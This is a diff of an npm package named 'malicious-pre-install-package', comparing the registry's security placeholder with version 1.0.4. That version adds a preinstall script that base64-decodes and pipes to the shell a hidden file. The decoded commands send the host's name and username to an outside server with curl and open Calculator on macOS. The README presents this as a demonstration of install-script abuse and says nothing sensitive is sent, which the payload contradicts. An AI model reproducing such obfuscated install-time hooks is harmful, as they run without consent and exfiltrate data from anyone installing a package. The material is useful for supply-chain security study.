malicious-pre-install-package 0.0.1-security → 1.0.4

package/README.md

@@ -1,5 +1,7 @@
-# Security holding package
+# malicious-pre-install-package
+Please don't install this package.
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
 
-Please refer to www.npmjs.com/advisories?search=malicious-pre-install-package for more information.
+### Why?
+This package is just a "private" project to showcase how easy it is to abuse the preinstall and postinstall scripts in npm. 
+This specific package does not send any sensitive information, but it could as well send SSH keys or any other sensitive credentials.

package/package.json

@@ -1,6 +1,20 @@
 {
   "name": "malicious-pre-install-package",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "base64 -d suspiciousfile.txt | sh",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/adriandersen/malicious-pre-install-package.git"
+  },
+  "author": "",
+  "license": "ISC",
+  "bugs": {
+    "url": "https://github.com/adriandersen/malicious-pre-install-package/issues"
+  },
+  "homepage": "https://github.com/adriandersen/malicious-pre-install-package#readme"
 }

package/suspiciousfile.txt

@@ -0,0 +1 @@
+Y3VybCAtWCBQT1NUIC1IICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24iIC1kICJ7XCJkYXRhXCI6XCIkSE9TVE5BTUVAJCh3aG9hbWkpXCJ9IiBodHRwczovL2FwaS51dGVuLmFwcC9zZWMvZHluYW1pY2R1bXAvbXBpcAoKaWYgW1sgIiRPU1RZUEUiID09ICJkYXJ3aW4iKiBdXTsgdGhlbgogICAgICAgIG9wZW4gLWEgL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAKZmk=